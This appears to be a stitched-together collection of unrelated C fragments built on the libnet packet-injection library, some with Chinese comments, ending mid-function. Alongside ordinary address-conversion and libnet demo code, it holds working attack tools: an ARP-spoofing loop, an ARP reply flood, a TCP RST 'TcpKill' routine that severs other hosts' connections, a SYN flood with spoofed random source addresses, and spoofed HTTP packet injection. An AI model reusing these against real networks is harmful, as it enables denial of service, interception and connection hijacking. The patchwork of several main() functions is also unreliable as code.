/*
* Libnet initialize
*/
int libnet_initialize(char *lnet_errbuf, u_int32_t *src_ip, u_int32_t *dst_ip)
{
// libnet init
l = libnet_init(LIBNET_RAW4, progopt.device_set() ? progopt.device : NULL, lnet_errbuf);
if ( l == NULL ) {
return 0;
}
// check destination ip
*dst_ip = libnet_name2addr4(l, progopt.dstaddr, LIBNET_DONT_RESOLVE);
if(*dst_ip<1) {
strncpy(lnet_errbuf, "Destination address error.\n", LIBNET_ERRBUF_SIZE);
return 0;
}
// check source ip
if(progopt.srcaddr_set()) {
*src_ip = libnet_name2addr4(l, progopt.srcaddr, LIBNET_DONT_RESOLVE);
if(*src_ip<1) {
strncpy(lnet_errbuf, "Source address error.\n", LIBNET_ERRBUF_SIZE);
return 0;
}
}
else {
*src_ip = libnet_get_ipaddr4(l);
if(*src_ip<1) {
strncpy(lnet_errbuf, libnet_geterror(l), LIBNET_ERRBUF_SIZE);
return 0;
}
}
return 1;
}
int
main(int argc, char *argv[])
{
extern char *optarg;
extern int optind;
char pcap_ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
int c;
intf = NULL;
spoof_ip = target_ip = 0;
while ((c = getopt(argc, argv, "i:t:h?V")) != -1) {
switch (c) {
case 'i':
intf = optarg;
break;
case 't':
if ((target_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
usage();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (argc != 1)
usage();
if ((spoof_ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1)
usage();
if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL)
errx(1, "%s", pcap_ebuf);
if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL)
errx(1, "%s", libnet_ebuf);
if (target_ip != 0 && !arp_find(target_ip, &target_mac))
errx(1, "couldn't arp for host %s",
libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE));
signal(SIGHUP, cleanup);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
for (;;) {
arp_send(l, ARPOP_REPLY, NULL, spoof_ip,
(target_ip ? (u_int8_t *)&target_mac : NULL),
target_ip);
sleep(2);
}
/* NOTREACHED */
exit(0);
}
void main(int argc,char *argv[])
{
if(argc!=2)
{
printf("用法错误:需要添加目的IP参数\n");
return;
}
char error_buf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
l= libnet_init(LIBNET_LINK_ADV,NULL,error_buf);
if(l==NULL)
{
printf("libnet初始化错误:%s\n",error_buf);
libnet_destroy(l);
return;
}
u_char arp_sha[6]={0x00,0x1e,0x90,0xc7,0xe3,0xbb};
u_char arp_dha[6]={0x00,0x00,0x00,0x00,0x00,0x00};
char *arp_src_ip="192.168.1.6";
u_int arp_spa=libnet_name2addr4(l,arp_src_ip,LIBNET_RESOLVE);
char *arp_dst_ip=argv[1];
u_int arp_dpa=libnet_name2addr4(l,arp_dst_ip,LIBNET_RESOLVE);
if(libnet_build_arp(ARPHRD_ETHER,ETHERTYPE_IP,6,4,ARPOP_REQUEST,arp_sha,(u_int8_t *)&arp_spa,arp_dha,(u_int8_t *)&arp_dpa,NULL,0,l,0)==-1)
{
printf("构造ARP错误:%s\n",libnet_geterror(l));
libnet_destroy(l);
return;
}
u_char ether_sha[6]={0x00,0x1e,0x90,0xc7,0xe3,0xbb};
u_char ether_dha[6]={0xff,0xff,0xff,0xff,0xff,0xff};
if(libnet_build_ethernet(ether_dha,ether_sha,ETHERTYPE_ARP,NULL,0,l,0)==-1)
{
printf("构造以太错误:%s\n",libnet_geterror(l));
libnet_destroy(l);
return;
}
//libnet_diag_dump_pblock(l);
//libnet_diag_dump_context(l);
libnet_write(l);
libnet_destroy(l);
return;
}
//===============================
//I tried to do this same concept using LIBNET_RAW4 instead of LIBNET_LINK so
//I wouldn't have to worry about the ethernet header. But something weird happens when I
//try to do this. If there is already an established connection.. e.g. 70.116.23.2:3779 to
//192.168.0.2:6112, if we send the packet using raw4, in tcpdump we get
//70.116.23.2:1024 --> 192.168.0.2:6112. I am really not sure why it won't send the correct
//source port if that connection is already established, but using LIBNET_LINK seems to not
//have this problem. I believe it is a kernel related issue.
void TcpKill::Execute(const wxString &sIp, u_int nPort)
{
char szErrBuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip;
libnet_ptag_t tcp;
wxString sSniffDevice = CONFIG(wxString, "Network/SniffDevice");
wxString sGameHost = CONFIG(wxString, "Network/GameHost");
int nGamePort = CONFIG(int, "Network/GamePort");
shared_ptr<NodeInfo> pNodeInfo = Info::Get()->GetNodeInfo(sIp, nPort);
if (!pNodeInfo) {
//Interface::Get()->Output(wxString::Format("Can't find %s:%d in net info map.", m_sIp.c_str(), m_nPort), OUTPUT_ERROR);
return;
}
NetInfo &netInfo = Info::Get()->GetNetInfo();
//This is pretty inefficient since I constantly init libnet and destroy it. It would be better
//if we could init once and just keep changing the sequence number and destination ip.
for (u_int x = 0; x < m_nSeverity; x++) {
u_int32_t seq_out = pNodeInfo->last_sentack;
libnet_t *pLibnet = libnet_init(LIBNET_LINK, const_cast<char *>(sSniffDevice.c_str()), szErrBuf);
libnet_seed_prand(pLibnet);
tcp = libnet_build_tcp(nPort, nGamePort,
seq_out, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, pLibnet, 0);
u_long src_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sIp.c_str()), LIBNET_DONT_RESOLVE);
u_long dst_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sGameHost.c_str()), LIBNET_DONT_RESOLVE);
ip = libnet_build_ipv4(sizeof(net_ip) + sizeof(net_tcp), 0,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0,
src_ip, dst_ip, NULL, 0, pLibnet, 0);
libnet_autobuild_ethernet(netInfo.gamehost_ether, ETHERTYPE_IP, pLibnet);
libnet_write(pLibnet);
libnet_destroy(pLibnet);
}
}
/* load_ip: load IP data file into memory */
load_ip()
{
FILE *infile;
char proto_line[40] = "";
char id_line[40] = "";
char frag_line[40] = "";
char ttl_line[40] = "";
char saddr_line[40] = "";
char daddr_line[40] = "";
char tos_line[90] = "";
char z_zsaddr[40] = "";
char z_zdaddr[40] = "";
char inter_line[15]="";
infile = fopen(ip_file, "r");
fgets(id_line, 11, infile); /* this stuff should be obvious if you read the above subroutine */
fgets(frag_line, 13, infile); /* see RFC 791 for details */
fgets(ttl_line, 10, infile);
fgets(saddr_line, 24, infile);
fgets(daddr_line, 24, infile);
fgets(proto_line, 40, infile);
fgets(inter_line, 15, infile);
fgets(tos_line, 78, infile);
sscanf(id_line, "id,%d", &i_id);
sscanf(frag_line, "frag,%d", &i_frag);
sscanf(ttl_line, "ttl,%d", &i_ttl);
sscanf(saddr_line, "saddr,%s", &z_zsaddr);
sscanf(daddr_line, "daddr,%s", &z_zdaddr);
sscanf(proto_line, "proto,%s", &ip_proto);
sscanf(inter_line, "interval,%d", &nap_time);
sscanf(tos_line, "tos,%[^!]", &i_ttos);
i_src_addr = libnet_name2addr4(l, z_zsaddr, LIBNET_RESOLVE);
i_des_addr = libnet_name2addr4(l, z_zdaddr, LIBNET_RESOLVE);
fclose(infile);
}
int
check_isn(pkt_t *dp, in_port_t port, u_int32_t *isn)
{
u_char md5[MD5_DIGEST_LENGTH];
u_int32_t s = 0;
struct {
u_int32_t secret;
u_int32_t addr;
in_port_t port;
} seed;
(void)memset(&seed, 0, sizeof(seed));
seed.secret = dp->secret;
seed.addr = libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE);
seed.port = port;
(void)MD5((u_char *)&seed, sizeof(seed), md5);
(void)memcpy(&s, md5, sizeof(s));
switch (*isn) {
case 0:
*isn = htonl(s);
return (0);
break;
default:
if (*isn == htonl(s+1))
return (0);
(void)fprintf(stdout, "\t[ISN RECEIVED = %u, EXPECTING = %u, SECRET = %u, ADDR = %s, PORT = %u]\n",
*isn, htonl(s+1), dp->secret, dp->daddr, port);
/* fall through */
}
return (-1);
}
int main(int argc, char** argv){
libnet_t *l; //libnet context
char errbuf[LIBNET_ERRBUF_SIZE];
char ip_addr_str[16], mac_addr_str[18];
u_int32_t ip_addr;
u_int8_t *ip_addr_p, *mac_addr;
int i, length; //for libnet_hex_aton
if( argc <= 1 ){
fprintf(stderr, "Usage: %s <iface>\n", argv[0]);
exit(EXIT_FAILURE);
}
l = libnet_init(LIBNET_RAW4 /*inj. type*/, argv[1] /* iface */, errbuf);
if( l == NULL ){
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
//IP addr
printf("IP addr: ");
scanf("%15s", ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_RESOLVE);
if( ip_addr != -1 ){ //no error
//libnet always deals with stuff in network order
/* Check your system's endianess: */
ip_addr_p = (u_int8_t*)(&ip_addr);
printf("ip_addr: %08X\n", ip_addr);
printf("ip_addr_p: %02X %02X %02X %02X\n", ip_addr_p[0],\
ip_addr_p[1], ip_addr_p[2], ip_addr_p[3]);
printf("Address as per addr2name4: %s\n", \
libnet_addr2name4(ip_addr, LIBNET_DONT_RESOLVE));
}
else{
fprintf(stderr, "Error converting IP\n");
}
// MAC addr
printf("MAC address: ");
scanf("%17s", mac_addr_str);
mac_addr = libnet_hex_aton((int8_t*)mac_addr_str, &length);
if( mac_addr != NULL) {
printf("Address read: ");
for ( i=0; i < length; i++) {
printf("%02X", mac_addr[i]);
if ( i < length-1 )
printf(":");
}
printf("\n");
// Remember to free the memory allocated by libnet_hex_aton()
free(mac_addr);
}
else{
fprintf(stderr, "Error converting MAC address.\n");
}
libnet_destroy(l);
return 0;
}
int main(int argc, char *argv[]) {
libnet_t *libnet_context;
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE];
int opt, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
libnet_context = libnet_init(LIBNET_RAW4, NULL, errbuf); // Init libnet context
if ( libnet_context == NULL )
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
dest_ip = libnet_name2addr4(libnet_context, argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
libnet_seed_prand(libnet_context); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // checksum (0 autofill)
0, // urgent pointer
LIBNET_TCP_H, // tcp packet length
NULL, // payload (none)
0, // payload length
libnet_context, // context
0); // ptag
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
0, // checksum
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
libnet_context, // libnet context
0); // ptag
byte_count = libnet_write(libnet_context); // inject packet
if ( byte_count != -1 )
printf("%d bytes written.\n", byte_count);
else
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(libnet_context));
libnet_clear_packet(libnet_context); // clear packet
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy(libnet_context); // free packet memory
return 0;
}
/*
=======================================================================================================================
在windows平台下必须包含此文件,文件libnet.h是libnet开发包的头文件
=======================================================================================================================
*/
void main()
{
int packet_size;
/* 存放数据包长度的变量 */
libnet_t *l;
/* libnet句柄 */
libnet_ptag_t protocol_tag;
/* 协议块标记 */
int num;
char *device = NULL;
/* 设备名字,此时为NULL */
char error_information[LIBNET_ERRBUF_SIZE];
/* 用来存放错误信息 */
char *destination_ip_str = "192.168.1.1";
/* 目的IP地址字符串变量,可以指定任意一个合法的IP地址 */
char *source_ip_str = "192.168.1.102";
/* 源IP地址字符串变量,可以指定任意一个合法的IP地址 */
u_char hardware_source[6] =
{
0x01, 0x02, 0x03, 0x04, 0x05, 0x06
};
/* 源MAC地址,可以是任意指定 */
u_char hardware_destination[6] =
{
0x00, 0x14, 0x78, 0xA7, 0xC8, 0x44
};
/* 目的MAC地址,可以是任意指定 */
u_long destination_ip;
/* 目的IP地址 */
u_long source_ip;
/* 源IP地址 */
destination_ip = libnet_name2addr4(l, destination_ip_str, LIBNET_RESOLVE);
/* 把目的IP地址字符串形式转化成网络顺序字节形式的数据 */
source_ip = libnet_name2addr4(l, source_ip_str, LIBNET_RESOLVE);
/* 把源IP地址字符串形式转化成网络顺序字节形式的数据 */
l = libnet_init(
/* 初始化libnet */
LIBNET_LINK_ADV,
/* libnet类型 */
device,
/* 网络设备 */
error_information); /* 错误信息
* */
protocol_tag = libnet_build_arp(
/* 构造ARP协议块,函数的返回值是代表新生成的ARP协议块的一个协议块标记, */
ARPHRD_ETHER,
/* 硬件地址类型,在这里是以太网 */
ETHERTYPE_IP,
/* 协议地址类型,在这里是IP协议 */
6,
/* 硬件地址长度,MAC地址的长度为6 */
4,
/* 协议地址长度,IP地址的长度为4 */
ARPOP_REPLY,
/* 操作类型,在这里是ARP应答类型 */
hardware_source,
/* 源硬件地址 */
(u_int8_t*) &source_ip,
/* 源IP地址 */
hardware_destination,
/* 目标硬件地址 */
(u_int8_t*) &destination_ip,
/* 目标协议地址 */
NULL,
/* 负载,此时为NULL */
0,
/* 负载的长度,此时为0 */
l,
/* libnet句柄,此句柄由libnet_init()函数生成 */
0
/* 协议块标记,此时为0,表示构造一个新的ARP协议块,而不是修改已经存在的协议块
* */
);
protocol_tag = libnet_autobuild_ethernet(
/* 构造一个以太网协议块,返回一个指向此协议块的标记 */
hardware_destination,
/* 目的硬件地址 */
ETHERTYPE_ARP,
/* 以太网上层协议类型,此时为ARP类型 */
l /* libnet句柄 */
);
while(1)
{
Sleep(100);
packet_size = libnet_write(l);
/*
* 发送已经构造的ARP数据包,注意此数据包应该包括两部分,一部分是ARP协议块,另外一部分是以太网协议块
*/
printf("发送一个%d字节长度的ARP应答数据包\n", packet_size);
/* 输出发送的ARP数据包的字节数 */
}
libnet_destroy(l);
/* 销毁libnet */
}
int
main(int argc, char *argv[])
{
int c;
char *cp;
libnet_t *l;
libnet_ptag_t t;
char *payload;
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: TCP (over Token Ring) [link]\n");
/*
* Initialize the library. Root priviledges are required.
*
* Currently hard-coded for tr0.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
"tr0", /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
payload = NULL;
payload_s = 0;
while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
payload = optarg;
payload_s = strlen(payload);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
t = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + payload_s, /* TCP packet size */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_token_ring(
LIBNET_TOKEN_RING_FRAME,
LIBNET_TOKEN_RING_LLC_FRAME, /* LLC - Normal buffer */
tr_dst, /* token ring destination */
tr_src, /* token ring source */
LIBNET_SAP_SNAP, /* DSAP -> SNAP encap */
LIBNET_SAP_SNAP, /* SSAP -> SNAP encap */
0x03, /* Unnumbered info/frame */
org_code, /* Organization Code */
TOKEN_RING_TYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build token ring header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char **argv)
{
int c, build_ip;
struct timeval r;
struct timeval s;
struct timeval e;
libnet_t *l;
libnet_ptag_t udp;
char *payload;
libnet_ptag_t t;
struct libnet_stats ls;
u_short payload_s;
u_long src_ip, dst_ip;
u_short bport, eport, cport;
libnet_plist_t plist, *plist_p;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1.0 packet shaping: UDP2[link]\n");
l = libnet_init(
LIBNET_LINK, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
payload = NULL;
payload_s = 0;
plist_p = NULL;
while ((c = getopt(argc, argv, "d:s:p:P:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(1);
}
break;
case 'P':
plist_p = &plist;
if (libnet_plist_chain_new(l, &plist_p, optarg) == -1)
{
fprintf(stderr, "Bad token in port list: %s\n",
libnet_geterror(l));
exit(1);
}
break;
case 'p':
payload = optarg;
payload_s = strlen(payload);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip || !plist_p)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
udp = 0;
#if !(__WIN32__)
gettimeofday(&s, NULL);
#else
/* This obviously is not as good - but it compiles now. */
s.tv_sec = time(NULL);
s.tv_usec = 0;
#endif
build_ip = 1;
while (libnet_plist_chain_next_pair(plist_p, &bport, &eport))
{
while (!(bport > eport) && bport != 0)
{
cport = bport++;
udp = libnet_build_udp(
1025, /* source port */
cport, /* destination port */
LIBNET_UDP_H + payload_s, /* packet size */
0, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
udp); /* libnet id */
if (udp == -1)
{
fprintf(stderr, "Can't build UDP header (at port %d): %s\n",
cport, libnet_geterror(l));
goto bad;
}
if (build_ip)
{
build_ip = 0;
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0);
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
enet_dst, /* ethernet destination */
enet_src, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0);
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
}
//usleep(100);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "write error: %s\n", libnet_geterror(l));
}
else
{
fprintf(stderr, "wrote %d UDP packet to port %d\n", c, cport);
// fprintf(stderr, ".");
}
}
}
#if !(__WIN32__)
gettimeofday(&s, NULL);
#else
/* This obviously is not as good - but it compiles now. */
s.tv_sec = time(NULL);
s.tv_usec = 0;
#endif
libnet_timersub(&e, &s, &r);
fprintf(stderr, "Total time spent in loop: %ld.%ld\n", r.tv_sec, r.tv_usec);
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
void
drench_send_tcp(pkt_t *dp, u_int8_t offset, u_char *pkt)
{
struct ether_header *eh = NULL;
struct ip *ih = NULL;
struct tcphdr *th = NULL;
char *state = NULL;
in_port_t sport = 0;
size_t paylen = 0;
u_int32_t isn = 0;
if (dp->payload != NULL)
paylen = strlen(dp->payload);
state = TCP_PHASE(dp->flags, "S", "A");
if (pkt != NULL) {
eh = (struct ether_header *)pkt;
ih = (struct ip *)(pkt + sizeof(struct ether_header));
th = (struct tcphdr *)(pkt + sizeof(struct ether_header) + sizeof(struct ip));
isn = th->th_ack;
sport = th->th_dport;
}
else {
sport = libnet_get_prand(LIBNET_PRu16);
}
/* Sanity check: check the ack number of the packet to
* make sure we sent it. We can do this by performing
* a calculation on the sequence number we
* send, based on a "secret" random number */
if (check_isn(dp, sport, &isn) < 0) {
(void)fprintf(stdout,
"(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u INVALID ISN in ACK%s [isn = %u]\n",
state,
TCP_PHASE(
dp->flags,
dp->saddr,
libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
),
sport,
TCP_PHASE(
dp->flags,
dp->daddr,
libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
),
dp->dport,
(dp->opts & O_CHKISN ? ", DROPPING PACKET" : ""),
isn);
if (dp->opts & O_CHKISN)
return;
}
LIBNET_ERR(dp->p_tcp = libnet_build_tcp(
TCP_PHASE(dp->flags, sport, th->th_dport), /* Source port */
dp->dport, /* Destination port */
TCP_PHASE(dp->flags, isn, (th->th_ack + paylen)), /* ISN */
/* Sniffed packet's seq num */
TCP_PHASE(dp->flags, 0, (th->th_seq + 1)), /* ACK */
TCP_PHASE(dp->flags, dp->flags, dp->flags /*| TH_PUSH*/), /* Control flags */
dp->winsize, /* window size */
0, /* auto checksum */
0, /* Urgent data pointer */
TCP_PHASE(dp->flags, LIBNET_TCP_H, LIBNET_TCP_H + paylen), /* total packet length */
TCP_PHASE(dp->flags, NULL, (u_char *)dp->payload), /* payload */
TCP_PHASE(dp->flags, 0, paylen), /* payload size */
dp->l, /* libnet context */
dp->p_tcp /* ptag */
));
LIBNET_ERR(dp->p_ip = libnet_build_ipv4(
TCP_PHASE(dp->flags, LIBNET_IPV4_H + LIBNET_TCP_H, LIBNET_IPV4_H + LIBNET_TCP_H + paylen),
TCP_PHASE(dp->flags, 0, IPTOS_LOWDELAY), /* TOS */
libnet_get_prand(LIBNET_PRu16),
0, /* Frag */
MAX_TTL, /* TTL */
IPPROTO_TCP, /* Protocol */
0, /* auto checksum */
TCP_PHASE(dp->flags, htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
ih->ip_dst.s_addr), /* XXX error check, source */
TCP_PHASE(dp->flags, libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE),
ih->ip_src.s_addr), /* XXX error check, destination */
NULL, /* payload */
0, /* payload size */
dp->l, /* libnet context */
dp->p_ip /* libnet ptag */
));
if (libnet_write(dp->l) == -1)
state = "x";
(void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u\n", state,
TCP_PHASE(
dp->flags,
libnet_addr2name4(
htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
LIBNET_DONT_RESOLVE
),
libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
),
sport,
TCP_PHASE(
dp->flags,
dp->daddr,
libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
),
dp->dport);
(void)fflush(stdout);
}
int
libnet_select_device(libnet_t *l)
{
int c, i;
int8_t err_buf[LIBNET_ERRBUF_SIZE];
struct libnet_ifaddr_list *address_list, *al;
u_int32_t addr;
if (l == NULL)
{
return (-1);
}
if (l->device && !isdigit(l->device[0]))
{
#if !(__WIN32__)
if (libnet_check_iface(l) < 0)
{
/* err msg set in libnet_check_iface() */
return (-1);
}
#endif
return (1);
}
/*
* Number of interfaces.
*/
c = libnet_ifaddrlist(&address_list, l->device, err_buf);
if (c < 0)
{
/* err msg set in libnet_ifaddrlist() */
return (-1);
}
else if (c == 0)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): no network interface found\n", __func__);
return (-1);
}
al = address_list;
if (l->device)
{
/*
* Then we have an IP address in l->device => do lookup
*/
addr = libnet_name2addr4(l, l->device, 0);
for (i = c; i; --i, ++address_list)
{
if (((addr == -1) && !(strncmp(l->device, address_list->device,
strlen(l->device)))) ||
(address_list->addr == addr))
{
/* free the "user supplied device" - see libnet_init() */
free(l->device);
l->device = strdup(address_list->device);
goto good;
}
}
if (i <= 0)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): can't find interface for IP %s\n", __func__,
l->device);
goto bad;
}
}
else
{
l->device = strdup(address_list->device);
}
good:
for (i = 0; i < c; i++)
{
free(al[i].device);
}
return (1);
bad:
for (i = 0; i < c; i++)
{
free(al[i].device);
}
return (-1);
}
int main(int argc, char *argv[])
{
int c, i;
u_char *cp;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t tcp;
struct libnet_stats ls;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char opt[20];
char errbuf[LIBNET_ERRBUF_SIZE];
FILE *dmf;
char *dms;
int pay_s;
char *dmfn = "kw.txt";
char *paybuf, *pp;
u_char bt;
char linebuf[MAXTEXT];
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
dst_ip = libnet_get_prand(LIBNET_PRu32);
src_ip = libnet_get_prand(LIBNET_PRu32);
src_prt = libnet_get_prand(LIBNET_PRu16);
dst_prt = 80; /* http */
while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
dst_prt = (u_short)atoi(optarg);
printf("Dest port: %d\n", dst_prt);
break;
case 'f':
dmfn = optarg;
printf("File name: %s\n", dmfn);
break;
default:
exit(EXIT_FAILURE);
}
}
/* Read the keywords, dest IPs, src IPs , and construct http payload */
if( (dmf = fopen(dmfn, "r")) == NULL) {
fprintf(stderr, "Error opening the content file %s \n", dmfn);
exit(1);
} /* end if */
printf("Reading content ...\n");
i = 0;
while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) )
{
linebuf[i++] = c;
}
fclose(dmf);
linebuf[i] = '\0';
paybuf = linebuf;
dms = (char *)malloc(strlen(paybuf)+1); /* alloc mem */
strcpy(dms, paybuf);
pay_s = strlen(dms);
/* ===== for message body debugging */
printf("Content read:\n");
for (i=0; i < pay_s; i++) {
bt = *(dms + i);
printf(" %02X", bt);
}
printf("\n");
/*=== */
/* Building TCP */
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
